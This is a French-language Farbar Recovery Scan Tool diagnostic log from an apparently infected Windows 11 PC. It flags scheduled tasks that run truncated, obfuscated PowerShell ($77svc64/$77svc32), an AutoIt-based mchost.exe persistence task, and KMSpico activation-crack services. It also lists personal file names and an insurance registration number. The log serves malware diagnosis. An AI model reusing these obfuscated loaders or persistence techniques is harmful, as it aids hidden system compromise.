Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 11-01-2023
Exécuté par MUSTAPHA (administrateur) sur MUSTAPHA (Hewlett-Packard HP ProDesk 600 G1 TWR) (14-01-2023 23:36:42)
Exécuté depuis C:\Users\MUSTAPHA\Downloads
Profils chargés: MUSTAPHA
Plate-forme: Microsoft Windows 11 Professionnel Version 21H2 22000.1455 (X64) Langue: Français (France)
Navigateur par défaut: Edge
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe ->) (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe <2>
(C:\Users\MUSTAPHA\AppData\Roaming\uTorrent\uTorrent.exe ->) (BitTorrent Inc -> BitTorrent Inc.) C:\Users\MUSTAPHA\AppData\Roaming\uTorrent\helper\helper.exe
(C:\Users\MUSTAPHA\AppData\Roaming\uTorrent\uTorrent.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(explorer.exe ->) (BitTorrent Inc -> BitTorrent Inc.) C:\Users\MUSTAPHA\AppData\Roaming\uTorrent\uTorrent.exe
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <37>
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleCrashHandler64.exe
(services.exe ->) (@ByELDI -> @ByELDI) [Fichier non signé] C:\Program Files\KMSpico\Service_KMS.exe
(services.exe ->) (Andrea Electronics -> Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(services.exe ->) (Intel(R) Trust Services -> Intel(R) Corporation) C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\TPMProvisioningService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\NisSrv.exe
(services.exe ->) (philandro Software GmbH -> AnyDesk Software GmbH) C:\Program Files (x86)\AnyDesk\AnyDesk.exe <2>
(services.exe ->) (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(services.exe ->) (Reason Cybersecurity Inc. -> Reason Software Company Inc.) C:\Program Files\RAVAntivirus\x64\rsSyncSvc.exe
(sihost.exe ->) (Zero Byte) C:\Program Files\WindowsApps\4789ZeroByte.NetSpeedMeter_4.0.4.0_neutral__gvheqymwk6zrr\App\Net Speed Meter.exe
(svchost.exe ->) (AutoIt Consulting Ltd -> AutoIt Team) C:\Users\MUSTAPHA\AppData\Roaming\eltuxe\mchost.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.YourPhone_1.22102.229.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\amd64\MoUsoCoreWorker.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8513792 2015-08-07] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411328 2015-08-07] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM-x32\...\Run: [Phantom_Sl] => C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\phantom_sl.exe [2039760 2020-01-09] (FOXIT SOFTWARE INC. -> Foxit Software Inc)
HKU\S-1-5-21-4254321709-1373425061-1975524411-1001\...\Run: [ut] => C:\Users\MUSTAPHA\AppData\Roaming\uTorrent\uTorrent.exe [2718880 2022-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-4254321709-1373425061-1975524411-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
HKU\S-1-5-21-4254321709-1373425061-1975524411-1001\...\Run: [MicrosoftEdgeAutoLaunch_73B63651CD9B755765C42F29AB380CE4] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3879368 2023-01-05] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-4254321709-1373425061-1975524411-1001\...\Run: [com.messenger] => "C:\Users\MUSTAPHA\AppData\Local\Programs\Messenger\Messenger.exe" messenger://openAtLogin (Pas de fichier)
HKU\S-1-5-21-4254321709-1373425061-1975524411-1001\...\MountPoints2: {50a023a5-e243-11ec-8252-ecb1d733fa94} - "E:\.\Setup.exe" AUTORUN=1
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\108.0.5359.126\Installer\chrmstp.exe [2023-01-13] (Google LLC -> Google LLC)
IFEO\osppsvc.exe: [VerifierDlls] SppExtComObjHook.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2022-12-10]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> AnyDesk Software GmbH)
Startup: C:\Users\MUSTAPHA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Envoyer à OneNote.lnk [2022-12-16]
ShortcutTarget: Envoyer à OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {07370C34-934C-493E-A538-E9723D7DBCF8} - System32\Tasks\Microsoft\Office\Office Performance Monitor => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe [160696 2023-01-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {1F3CF6A9-5005-4A50-8C77-3B5D439EE4A4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {274F33C7-16E7-4C7D-B4EE-4853EFC4730F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3691E5FA-0783-48B6-8465-678040D36DA5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3724CA09-F25B-4156-9B16-F9F40573F593} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26326520 2023-01-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {3F472714-1E97-4CBE-9301-74054919DC23} - System32\Tasks\$77svc64 => powershell "function Local:JmQmJTIAcDEC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ASTmzJuFApoMfh,[Parameter(Position=1)][Type]$VUeDsMSayb)$MxyODYqRTQo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+'ec'+'t' (l'élément de données a 5064 caractères en plus). <==== ATTENTION
Task: {5D0D56E5-E573-49F4-8EA1-7434AC6F6DB7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2022-01-16] (Google LLC -> Google LLC)
Task: {7005E7BD-4E72-463A-BB49-E42ADE39CAD7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2022-01-16] (Google LLC -> Google LLC)
Task: {8ABB3079-D1DE-4668-B421-25C1B1650EF1} - System32\Tasks\Meta\Messenger-SL-Helper-S-1-5-21-4254321709-1373425061-1975524411-1001 => C:\Users\MUSTAPHA\AppData\Local\Programs\Messenger\MessengerHelper.exe [1902840 2022-10-07] (Facebook, Inc. -> Meta Platforms, Inc.)
Task: {8E8AFD8A-1F06-4CE3-8328-071995BF7B41} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [144288 2023-01-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {9668CFF7-9A2E-41B5-81C3-B37C67D3D5EF} - System32\Tasks\$77svc32 => powershell "function Local:LTKyyxxAZouE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$osfdgoaMtykeAv,[Parameter(Position=1)][Type]$SNpjLkchsE)$vAGjuIzltmU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'le'+[Char](99)+'te'+'d (l'élément de données a 5174 caractères en plus). <==== ATTENTION
Task: {C3886466-EBC1-4613-BBBB-620ADCA0939A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D62940E5-4296-4668-A72F-2552EF1B526F} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [144288 2023-01-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {E8F693E6-0FC5-49B8-8F8F-5014C77808B6} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [745664 2016-01-11] (@ByELDI -> @ByELDI) [Fichier non signé]
Task: {EB0EDAA4-4186-44CA-86C0-503837A47951} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26326520 2023-01-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {F955EC47-8665-4FF5-AF5D-42A4DB4B4B36} - System32\Tasks\Mozilla\xsfjg => C:\Users\MUSTAPHA\AppData\Roaming\eltuxe\mchost.exe [893608 2023-01-14] (AutoIt Consulting Ltd -> AutoIt Team) -> "C:\Users\MUSTAPHA\AppData\Roaming\eltuxe\mchost.chm"

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)


==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Tcpip\Parameters: [DhcpNameServer] 41.214.140.4 41.214.140.5 8.8.8.8
Tcpip\..\Interfaces\{07178c84-d0ae-4970-bca5-2009612d7144}: [DhcpNameServer] 41.214.140.4 41.214.140.5 8.8.8.8
Tcpip\..\Interfaces\{0847bc26-93ef-44ce-a03a-9d6a883111f4}: [DhcpNameServer] 41.214.140.4 41.214.140.5 8.8.8.8
Tcpip\..\Interfaces\{7f9dedeb-a978-42f0-9b9a-4579255a45a4}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{9909a9e5-24b7-401d-b44a-baf058b5bbd3}: [DhcpNameServer] 41.214.140.4 41.214.140.5 8.8.8.8

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\MUSTAPHA\AppData\Local\Microsoft\Edge\User Data\Default [2023-01-14]
Edge Notifications: Default -> hxxps://entreprise.orange.ma; hxxps://pjd.ma
Edge HomePage: Default -> hxxps://poshukach.com?fr=ps&gp=496723&altserp=1
Edge StartupUrls: Default -> "hxxp://www.google.com/"

FireFox:
========
FF HKLM\...\Firefox\Extensions: [FFExtnHTML2PDF@foxitsoftware.com] - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\FirefoxAddin\FFExtnHTML2PDF.xpi
FF Extension: (Foxit PDF Creator) - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\FirefoxAddin\FFExtnHTML2PDF.xpi [2019-12-26] []
FF HKLM\...\Firefox\Extensions: [FireFoxNew-WebExtensions@foxitsoftware.com] - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\FirefoxAddin\FireFoxNew-WebExtensions@foxitsoftware.com.xpi
FF Extension: (Foxit PDF Creator) - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\FirefoxAddin\FireFoxNew-WebExtensions@foxitsoftware.com.xpi [2019-12-26]
FF HKLM-x32\...\Firefox\Extensions: [FFExtnHTML2PDF@foxitsoftware.com] - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\FirefoxAddin\FFExtnHTML2PDF.xpi
FF HKLM-x32\...\Firefox\Extensions: [FireFoxNew-WebExtensions@foxitsoftware.com] - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\FirefoxAddin\FireFoxNew-WebExtensions@foxitsoftware.com.xpi
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2019-12-26] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2019-12-26] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2019-12-26] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2019-12-26] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=3.0.17.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2022-03-24] (VideoLAN -> VideoLAN)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Default [2023-01-14]
CHR Notifications: Default -> hxxps://broforyou.me; hxxps://iegybest.co; hxxps://mail.google.com; hxxps://www.netflix.com
CHR HomePage: Default -> hxxps://youtube.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Extension: (Foxit PDF Creator) - C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Default\Extensions\cifnddnffldieaamihfkhkdgnbhfmaci [2022-11-22]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-10-16]
CHR Profile: C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Guest Profile [2023-01-14]
CHR Profile: C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Profile 1 [2023-01-14]
CHR Extension: (Safe Torrent Scanner) - C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-10-08]
CHR Extension: (Foxit PDF Creator) - C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cifnddnffldieaamihfkhkdgnbhfmaci [2022-12-02]
CHR Extension: (Google Docs hors connexion) - C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-12-02]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-10-08]
CHR Profile: C:\Users\MUSTAPHA\AppData\Local\Google\Chrome\User Data\System Profile [2023-01-14]
CHR HKLM\...\Chrome\Extension: [cifnddnffldieaamihfkhkdgnbhfmaci] - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\ChromeAddin\ChromeAddin.crx [2019-12-26]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [cifnddnffldieaamihfkhkdgnbhfmaci] - C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\ChromeAddin\ChromeAddin.crx [2019-12-26]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 AERTFilters; C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE [117168 2015-08-07] (Andrea Electronics -> Andrea Electronics Corporation)
R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3853384 2022-12-10] (philandro Software GmbH -> AnyDesk Software GmbH)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12548520 2023-01-14] (Microsoft Corporation -> Microsoft Corporation)
R2 rsSyncSvc; C:\Program Files\RAVAntivirus\x64\rsSyncSvc.exe [580320 2022-11-15] (Reason Cybersecurity Inc. -> Reason Software Company Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [245224 2022-12-10] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [745664 2016-01-11] (@ByELDI -> @ByELDI) [Fichier non signé]
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\NisSrv.exe [3191264 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MsMpEng.exe [133592 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 MpKsla88ce52f; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{B266A19B-E29A-4A51-BDDD-257BB8220DFD}\MpKslDrv.sys [214280 2023-01-14] (Microsoft Windows -> Microsoft Corporation)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167544 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49568 2022-12-09] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [473376 2022-12-09] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [99616 2022-12-09] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2023-01-14 23:36 - 2023-01-14 23:38 - 000019972 _____ C:\Users\MUSTAPHA\Downloads\FRST.txt
2023-01-14 23:14 - 2023-01-14 23:19 - 000001357 _____ C:\Users\MUSTAPHA\Downloads\Fixlog.txt
2023-01-14 23:13 - 2023-01-14 23:37 - 000000000 ____D C:\FRST
2023-01-14 23:13 - 2023-01-14 23:13 - 000000000 ____D C:\Users\MUSTAPHA\Downloads\FRST-OlderVersion
2023-01-14 23:12 - 2023-01-14 23:13 - 002376704 _____ (Farbar) C:\Users\MUSTAPHA\Downloads\FRST64-2.1 (1).exe
2023-01-14 15:36 - 2023-01-14 15:36 - 000003468 _____ C:\Windows\system32\Tasks\AutoPico Daily Restart
2023-01-14 15:36 - 2023-01-14 15:36 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\6B2D13C23E229DD0
2023-01-14 15:36 - 2023-01-14 15:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
2023-01-14 15:36 - 2010-12-06 03:16 - 000090112 _____ (Vestris Inc.) C:\Windows\system32\Vestris.ResourceLib.dll
2023-01-14 15:33 - 2023-01-14 15:33 - 006066315 _____ C:\Users\MUSTAPHA\Downloads\KMS_Pico_Full_Setup (1).zip
2023-01-14 15:23 - 2023-01-14 15:33 - 000000000 ____D C:\Users\MUSTAPHA\Desktop\Nouveau dossier (6)
2023-01-14 15:18 - 2022-12-07 11:18 - 018136270 _____ C:\Users\MUSTAPHA\Downloads\KMSAuto++v1.6.4.rar
2023-01-14 15:18 - 2022-10-19 19:46 - 000002070 _____ C:\Users\MUSTAPHA\Downloads\Instruction_SEPTEMBER_2022.txt
2023-01-14 15:18 - 2021-03-07 20:37 - 000008194 _____ C:\Users\MUSTAPHA\Downloads\DisableActivationConfig.reg
2023-01-14 15:18 - 2021-03-07 20:33 - 000008202 _____ C:\Users\MUSTAPHA\Downloads\EnableActivationConfig.reg
2023-01-14 15:16 - 2023-01-14 15:29 - 000000897 _____ C:\Users\MUSTAPHA\KMSAuto++.ini
2023-01-14 15:14 - 2023-01-14 15:25 - 017987504 _____ C:\Users\MUSTAPHA\kmsauto++v1.6.4.exe
2023-01-14 15:14 - 2023-01-14 15:25 - 000047328 _____ (Microsoft Corporation) C:\Users\MUSTAPHA\activationdriver.exe
2023-01-14 15:13 - 2023-01-14 15:13 - 019035422 _____ C:\Users\MUSTAPHA\Downloads\KMSAuto++2022.rar
2023-01-14 15:07 - 2023-01-14 15:07 - 000004608 _____ C:\Windows\SECOH-QAD.exe
2023-01-14 15:07 - 2023-01-14 15:07 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2023-01-14 15:06 - 2023-01-14 15:36 - 000000000 ____D C:\Program Files\KMSpico
2023-01-14 15:06 - 2023-01-14 15:06 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla
2023-01-14 15:06 - 2023-01-14 15:06 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\F9D5D51C3E229DD0
2023-01-14 15:06 - 2023-01-14 15:06 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\eltuxe
2023-01-14 15:05 - 2023-01-14 15:05 - 006066315 _____ C:\Users\MUSTAPHA\Downloads\KMS_Pico_Full_Setup.zip
2023-01-11 10:33 - 2023-01-11 10:35 - 000000000 ___HD C:\$WinREAgent
2023-01-09 21:34 - 2023-01-09 22:00 - 000055613 _____ C:\Users\MUSTAPHA\Desktop\Impression des journaux.pdf
2023-01-07 19:13 - 2023-01-07 19:13 - 000087089 _____ C:\Users\MUSTAPHA\Downloads\Simpl TP Declaration des elements imposables (1).xlsx
2023-01-07 19:11 - 2023-01-07 19:11 - 000087089 _____ C:\Users\MUSTAPHA\Downloads\Simpl TP Declaration des elements imposables.xlsx
2023-01-07 19:08 - 2023-01-07 19:08 - 004996038 _____ C:\Users\MUSTAPHA\Downloads\Régime fiscal des Avocats.pdf
2023-01-07 15:55 - 2023-01-07 18:20 - 000021066 _____ C:\Users\MUSTAPHA\Downloads\Classeur 5.xlsx
2023-01-07 15:19 - 2023-01-07 15:19 - 000000610 _____ C:\Users\Public\Desktop\JODAD TVA Access.lnk
2022-12-31 12:24 - 2022-12-31 12:24 - 000115936 _____ C:\Users\MUSTAPHA\Downloads\SIS2022V07038684.pdf
2022-12-31 12:09 - 2022-12-31 12:09 - 000115938 _____ C:\Users\MUSTAPHA\Downloads\SIS2022V07038583.pdf
2022-12-28 21:16 - 2022-12-28 21:16 - 004959653 _____ C:\Users\MUSTAPHA\Downloads\SR-7060_V1.39.16688_07112022 (1).zip
2022-12-27 21:24 - 2022-12-27 21:24 - 001541220 _____ C:\Users\MUSTAPHA\Downloads\Loi de finance 2023 bonne lecture .pdf
2022-12-26 13:47 - 2022-12-26 13:53 - 002664677 _____ C:\Users\MUSTAPHA\Downloads\BILAN 2021 XML OPERATIONNEL Version optimisée (3).xlsm
2022-12-26 13:35 - 2022-12-26 13:35 - 002856917 _____ C:\Users\MUSTAPHA\Downloads\LIASSE FISCALE EDI V7 (2).xlsm
2022-12-26 13:29 - 2022-12-26 13:29 - 000212699 _____ C:\Users\MUSTAPHA\Downloads\RELEVE_VIREMENT AMO IMMA _ 144915653 DU 07_09_2022.pdf
2022-12-26 13:29 - 2022-12-26 13:29 - 000211408 _____ C:\Users\MUSTAPHA\Downloads\RELEVE_VIREMENT AMO IMMA _ 144915653 DU 04_05_2022.pdf
2022-12-26 13:28 - 2022-12-26 13:28 - 000357797 _____ C:\Users\MUSTAPHA\Downloads\AVIS_DE CONTROLE DE SCOLARITE DES ENFANTS 2022_2023 - N¦ IMMA_ 144915653 - N¦ DOSSIER_ D54234694.pdf
2022-12-26 13:28 - 2022-12-26 13:28 - 000208002 _____ C:\Users\MUSTAPHA\Downloads\RELEVE_PRISE EN CHARGE AMO IMMA _ 144915653 DU 16_09_2022.pdf
2022-12-26 11:43 - 2022-12-26 11:43 - 000057185 _____ C:\Users\MUSTAPHA\Downloads\Channels list Derby (2).sdx
2022-12-26 11:41 - 2022-12-26 11:41 - 004679936 _____ C:\Users\MUSTAPHA\Downloads\TECHNOSTAR_DERBY_V117_06112022 (1).bin
2022-12-26 11:17 - 2022-12-26 11:17 - 000000000 ____D C:\Windows\system32\appmgmt
2022-12-25 22:04 - 2022-12-25 22:04 - 002688474 _____ C:\Users\MUSTAPHA\Downloads\BILAN 2021 XML OPERATIONNEL Version optimisée (2).xlsm
2022-12-25 22:03 - 2022-12-25 22:03 - 000037888 _____ C:\Users\MUSTAPHA\Downloads\Cadrage tva (1).xls
2022-12-25 22:02 - 2022-12-25 22:02 - 000037888 _____ C:\Users\MUSTAPHA\Downloads\Cadrage tva.xls
2022-12-25 21:54 - 2022-12-25 21:54 - 002686199 _____ C:\Users\MUSTAPHA\Downloads\BILAN 2021 XML OPERATIONNEL.xlsm.xlsx
2022-12-25 18:56 - 2022-12-25 18:56 - 003809416 _____ (Tencent) C:\Users\MUSTAPHA\Downloads\GLP_installer_900223086_market.exe
2022-12-25 18:03 - 2022-12-26 11:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tencent Software
2022-12-25 17:59 - 2022-12-25 18:02 - 000000000 ____D C:\Program Files\RAVAntivirus
2022-12-25 17:59 - 2022-12-25 17:59 - 009839352 _____ (Tencent) C:\Users\MUSTAPHA\Downloads\brawl-stars-1.0.12065.123-installer.exe
2022-12-25 17:58 - 2022-12-25 17:58 - 001798208 _____ ( ) C:\Users\MUSTAPHA\Downloads\brawl-stars-1.0.12065.123-installer_zXht2-1.exe

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

